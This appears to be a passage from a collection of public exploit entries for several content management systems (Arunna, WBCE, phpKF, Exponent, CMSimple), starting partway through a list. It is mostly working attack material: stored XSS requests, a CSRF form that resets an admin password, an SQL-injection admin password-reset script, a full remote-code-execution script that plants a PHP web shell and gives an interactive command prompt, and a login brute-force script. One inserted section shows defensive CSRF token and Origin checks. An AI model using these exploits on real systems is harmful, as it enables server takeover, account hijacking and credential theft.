POST /admin/blocks/regions/edit/3 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 336
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/blocks/regions/edit/3
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply

==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==

POST /admin/file-manager/attachments/edit/20 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/edit/20
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply
  21. # Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Date: November 29, 2021
# Exploit Author: =(L_L)=
# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/
# Vendor Homepage: https://github.com/arunna
# Software Link: https://github.com/arunna/arunna
# Version: 1.0.0
# Tested on: Ubuntu 20.04.2 LTS

<!-- The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). -->

<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1">
<table>
<tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr>
<tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr>
<tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr>
<tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr>
<tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr>
<tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr>
<tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr>
<tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr>
<tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr>
<tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr>
<tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr>
<tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr>
<tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr>
<tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr>
<tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr>
<tr><td>email[0]</td><td><input type="text" value="[email protected]" name="email[0]"></td></tr>
<tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr>
<tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr>
<tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr>
<tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr>
<tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr>
<tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr>
</table>
<input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1">
</form>
</html>
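The Arunna form above, like the meterN (item 12) and CLOKI (item 14) PoCs, is accepted because the server checks only that a valid session cookie rides along with the POST, which the browser attaches automatically. The example below is added to this thread and is not code from any of those projects. It shows the two server-side checks that stop this class of request: a per-session anti-CSRF token that must be echoed in the form body and is verified in constant time, plus an Origin/Referer check as defence in depth. The server secret, origin and session id are constructed values.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed server-side values (not from the original post). In a real
# deployment the secret is loaded from configuration and rotated.
SERVER_SECRET = secrets.token_bytes(32)
ALLOWED_ORIGIN = "https://app.example.test"


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to one session: nonce || HMAC(secret, session:nonce).
    Embed it as a hidden field in every state-changing form."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time.
    A token minted for another session, or a forged one, fails here."""
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def origin_allowed(headers: dict) -> bool:
    """Second line of defence: browsers send Origin on cross-site POSTs.
    Fall back to Referer, and refuse when neither is present."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == ALLOWED_ORIGIN


def accept_state_change(session_id: str, form: dict, headers: dict) -> bool:
    """Gate for a POST such as the user-edit request in the PoC: both checks
    must pass before any field of the form is acted on."""
    return origin_allowed(headers) and verify_csrf_token(session_id, form.get("csrf_token", ""))


if __name__ == "__main__":
    sid = "sess-constructed-1"
    token = issue_csrf_token(sid)
    forged = {"password[0]": "admin12345", "re_password[0]": "admin12345"}
    print("legit:", accept_state_change(sid, {"csrf_token": token}, {"Origin": ALLOWED_ORIGIN}))
    print("csrf: ", accept_state_change(sid, forged, {"Origin": "https://attacker.example"}))
```

The form in the PoC carries no token field at all, so with this gate in place it would be rejected before the Origin check even matters; the Origin check catches the case where an attacker somehow learns a stale token value.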
  22. # Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75

import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php'  # from my localhost environment
_domain = 'pylibs.org'  # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature

headers = {
    'User-Agent': 'Mozilla/5.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}

_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"

r = requests.post(url=_url, headers=headers, data=_p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive the plaintext password which belongs to the administrator.')
  23. # Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 18/12/2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.phpkf.com/
# Software Link: https://www.phpkf.com/indirme.php
# Version: 3.00
# Category: Webapps
# Tested on: Linux/Windows

# phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more.
# Contains an endpoint that allows remote access
# Necessary checks are not made in the file upload mechanism, only the file extension is checked
# The file with the extension ".png" can be uploaded and the extension can be changed.

# Example: python3 exploit.py -u http://example.com
#          python3 exploit.py -u http://example.com -l admin -p Admin123

from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import json


def main():
    parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)')
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-l', '--login', type=str, required=False)
    parser.add_argument('-p', '--password', type=str, required=False)
    args = parser.parse_args()

    print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)",
          "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    host(args)


def host(args):
    #Check http or https
    if args.host.startswith(('http://', 'https://')):
        print("[?] Check Url...\n")
        sleep(2)
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        else:
            pass
    else:
        print("\n[?] Check Adress...\n")
        sleep(2)
        args.host = "http://" + args.host
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        else:
            pass

    # Check Host Status
    try:
        response = requests.get(args.host)
        if response.status_code == 200:
            if args.login == None and args.password == None:
                create_user(args)
            else:
                login_user(args)
        else:
            print("[-] Address not reachable!")
            sleep(2)
    except requests.ConnectionError as exception:
        print("[-] Address not reachable!")
        sleep(2)
        exit(1)


def create_user(args):
    print("[*] Create User!\n")
    sleep(2)
    url = args.host + "/phpkf-bilesenler/kayit_yap.php"
    headers = {
        "Origin": args.host,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Referer": "http://fuzzing.com/uye-kayit.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "kayit_yapildi_mi": "form_dolu",
        "oturum": '',
        "kullanici_adi": "evil",
        "sifre": "Evil123",
        "sifre2": "Evil123",
        "posta": "[email protected]",
        "kosul": "on"
    }
    response = requests.post(url, headers=headers, data=data, allow_redirects=True)
    args.login = ("evil")
    args.password = ("Evil123")
    print("[+] " + args.login + ":" + args.password + "\n")
    sleep(2)
    login_user(args)


def login_user(args):
    url = args.host + "/uye-giris.php"
    headers = {
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/uye-giris.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "kayit_yapildi_mi": "form_dolu",
        "git": args.host + "/index.php",
        "kullanici_adi": args.login,
        "sifre": args.password,
        "hatirla": "on"
    }
    response = requests.post(url, headers=headers, data=data, allow_redirects=False)
    token = response.cookies.get("kullanici_kimlik")
    if (token != None):
        print("[!] Login Success!\n")
        sleep(2)
        upload_evil(args, token)
    else:
        if args.login == "evil" and args.password == "Evil123":
            print("[!] Unauthorized user!\n")
            print("[!] manually add a user and try again\n")
            print("[!] Go to link " + args.host + "/uye-kayit.php\n")
            print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'")
            sleep(2)
        else:
            print("[!] Unauthorized user!\n")
            sleep(2)


def upload_evil(args, token):
    url = args.host + "/phpkf-bilesenler/yukleme/index.php"
    cookies = {
        "kullanici_kimlik": token,
        "dil": "en"
    }
    headers = {
        "VERICEK": "",
        "DOSYA-ADI": "evil.png",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Content-type": "application/x-www-form-urlencoded; charset=utf-8",
        "Accept": "*/*",
        "Origin": args.host,
        "Referer": args.host + "/oi_yaz.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>"
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    if (response.text == "yuklendi"):
        print("[!] Upload Success!\n")
        sleep(2)
        change_name(args, token)
    else:
        print("[!] Upload Failed!\n")
        sleep(2)


def change_name(args, token):
    url = args.host + "/phpkf-bilesenler/yukleme/index.php"
    cookies = {
        "kullanici_kimlik": token,
        "dil": "en"
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Accept": "*/*",
        "Origin": args.host,
        "Referer": args.host + "/oi_yaz.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "yenidenadlandir": "evil.png|evil.php",
        "vericek": "/"
    }
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    if (response.text == "Name successfully changed..."):
        print("[!] Change Name evil.php!\n")
        sleep(2)
        find_dict(args, token)
    else:
        print("[!] Change Failed!\n")
        sleep(2)


def find_dict(args, token):
    url = args.host + "/phpkf-bilesenler/yukleme/index.php"
    cookies = {
        "kullanici_kimlik": token,
        "dil": "en"
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
        "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Accept": "*/*",
        "Origin": args.host,
        "Referer": args.host + "/oi_yaz.php",
        "Accept-Encoding": "gzip, deflate"
    }
    data = {
        "vericek": "/",
        "dds": "0"
    }
    response = requests.post(url, headers=headers, cookies=cookies, data=data)
    if (response.text == "You can not upload files!"):
        print("[!] File not found!\n")
        sleep(2)
    else:
        print("[!] Find Vuln File!\n")
        sleep(2)
        soup = BeautifulSoup(response.text, 'html.parser')
        path = soup.find("div").contents[1].replace(" ", "")
        exploit(args, path)


def exploit(args, path):
    print("[+] Exploit Done!\n")
    sleep(2)
    while True:
        cmd = input("$ ")
        url = args.host + path + "evil.php?cmd=" + cmd
        headers = {
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
        }
        response = requests.post(url, headers=headers, timeout=5)
        if response.text == "":
            print(cmd + ": command not found\n")
        else:
            print(response.text)


if __name__ == '__main__':
    main()
  24. # Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
# Exploit Author: heinjame
# Date: 22/10/2021
# Exploit Author: picaro_o
# Vendor Homepage: https://www.exponentcms.org/
# Version: <=2.6
# Tested on: Linux os

*Stored XSS*

Affected parameter => http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title, Text Block)

Payload = <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

*Database credentials are disclosed in response*

POC
```
var adminerwindow = function (){
    var win = window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
    if (!win) {
        err();
    }
}
```

*Authentication Bruteforce*
```
import argparse
import requests
import sys

parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
parser.add_argument("Username list", help="Username List")
parser.add_argument("Password list", help="Password List")
pargs = parser.parse_args()

host = sys.argv[1]
userlist = sys.argv[2]
passlist = sys.argv[3]

try:
    readuser = open(userlist)
    readpass = open(passlist)
except:
    print("Unable to load files")
    exit()

def usernamebrute():
    s = requests.Session()
    for username in readuser.readlines():
        brute={
            'controller':(None,'users'),
            'src':(None,''),
            'int':(None,''),
            'action':(None,'send_new_password'),
            'username':(None,username.strip()),
        }
        bruteforce = s.post(host+"/index.php",files=brute)
        status = s.get(host+"/users/reset_password")
        if "administrator" in status.text:
            print("[+] Found username : "+ username)
            adminaccount = username
            checkpoint = True
            return adminaccount,checkpoint
            break

def passwordbrute(adminaccount):
    s = requests.Session()
    s.cookies.set("csrftoken", "abc")
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
        'Referer': host+'/login/showlogin'
    }
    for password in readpass.readlines():
        brute={
            'controller':'login',
            'src':'',
            'int':'',
            'action':'login',
            'username':adminaccount,
            'password':password.strip()
        }
        bruteforce = s.post(host+"/index.php",headers=header,data=brute)
        # print(bruteforce.text)
        status = s.get(host+"/login/showlogin",cookies=csrf)
        print(status.text)
        if "Invalid Username / Password" not in status.text:
            print("[+] Found Password : "+ password)
            break

adminaccount,checkpoint = usernamebrute()
if checkpoint == True:
    passwordbrute(adminaccount)
else:
    print("Can't find username,We can't proceed sorry :(")
```
  25. # Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/?Downloads
# Version: <=5.4
# Tested on: Linux os

[Description]
Since the application is filtering user input with preg_replace, attackers are able to bypass the restriction by using HTML to Unicode encoding. So the application lets the attacker perform DOM based XSS.

[Payload and POC]
File > images > Upload a file
Attack vector >> ')-alert(1)//
(need to encode) >> &#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47;
When the victim clicks the delete button, an alert will be executed.

Script to encode the payload
payload = input()
finalpayload = ""
for i in payload:
    finalpayload = finalpayload + "&#" + str(ord(i)) + ";"
print(finalpayload)